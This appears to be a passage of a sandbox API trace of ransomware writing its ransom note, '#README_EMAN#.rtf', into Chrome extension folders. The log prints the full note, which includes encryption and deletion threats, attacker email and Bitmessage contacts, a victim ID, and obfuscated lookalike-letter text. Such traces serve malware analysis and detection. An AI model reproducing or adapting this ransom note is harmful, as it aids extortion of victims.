WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.217] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.217] CloseHandle (hObject=0x2ec) returned 1 [0291.217] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0291.217] GetLastError () returned 0x2 [0291.217] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.218] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 